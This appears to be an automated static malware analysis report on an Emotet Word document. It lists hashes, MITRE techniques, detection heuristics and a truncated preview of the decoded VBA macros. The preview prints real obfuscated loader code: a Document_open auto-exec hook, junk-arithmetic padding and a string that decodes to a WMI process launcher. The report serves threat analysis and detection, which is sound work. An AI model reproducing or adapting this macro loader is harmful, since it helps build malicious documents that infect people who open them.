Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 bd389be93c4aec08…

MALICIOUS

Office (OLE)

218.6 KB Created: 2020-08-27 14:01:00 Authoring application: Microsoft Office Word First seen: 2020-09-07
MD5: 95edfa7017af7bfbbf9753a3ef921886 SHA-1: 95a0e8d3f907a92d1102ac36359ae74ebecff449 SHA-256: bd389be93c4aec08317b46159c7afbb0dc573ec9d6310e2d0deaa94f3f2b577d
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open auto-execution macro and a hidden UserForm command stager, which are hallmarks of Emotet. The VBA code is heavily obfuscated but the presence of CreateObject and the ClamAV detection signature strongly suggest it functions as a downloader for a second-stage payload. The embedded URL was confirmed benign, so no URL IOCs are listed.

Heuristics 7

  • ClamAV: Doc.Downloader.EmotetRed02226-9938639-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.EmotetRed02226-9938639-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10205 bytes
SHA-256: feeb8c3700f8d554467e7c49ffb1b29790138420e2faeb5b13aa251f85d333dd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "K6xkgfqxmm1lp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Mfkodeaj_o2uq8.V94drssu_po8q
End Sub


Attribute VB_Name = "Mfkodeaj_o2uq8"
Attribute VB_Base = "0{AD90CE8A-44EC-4869-9868-7D88842C9460}{5237E844-6FDC-4071-822E-AD607F5154E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function V94drssu_po8q()
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
Y56rjd59qeco4 = 100
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
E9uisxyxmsytal = ChrW(Y56rjd59qeco4 + (xw + 5 + jwb + 10))
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
Kic1r8b9knm3ymu1 = "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())i(hsv 32(()hq gq721g()))) hsu0())nm(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())gm(hsv 32(()hq gq721g()))) hsu0())t(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())" + E9uisxyxmsytal + "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0()):(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())in(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())3(hsv 32(()hq gq721g()))) hsu0())2(hsv 32(()hq gq721g()))) hsu0())_(hsv 32(()hq gq721g()))) hsu0())" + Mfkodeaj_o2uq8.G4qcvx5jzoj2 + "(hsv 32(()hq gq721g()))) hsu0())ro(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())ce(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())"
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
P90mwgttq9qkb18 = E5aj431k40a0s_(Kic1r8b9knm3ymu1)
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
Qx1otfatefyt = Mfkodeaj_o2uq8.D96ys9vb48g0dq7nz.ControlTipText
   On Error Resume Next
         klEP6Sq = DznF6Si0d / Int(3) / vSHlR20C1 / Atn(LEOT3) / 2336 * Int(MPZK) + 451405852 / CByte(qnBvW / Sgn(30)) * 62579157 / Sgn(CSng(8598 / Round(ylsug6 - ChrB(ovYc62))))
         duFdpjP83 = 458911467 - Tan(60 / Hex(qcwPSmxj / Hex(ijME * BZaG7icX9 * 9 * CLng(3370)))) - 98 - Fix(3963 * zyD)
Jjkwcku2_
... (truncated)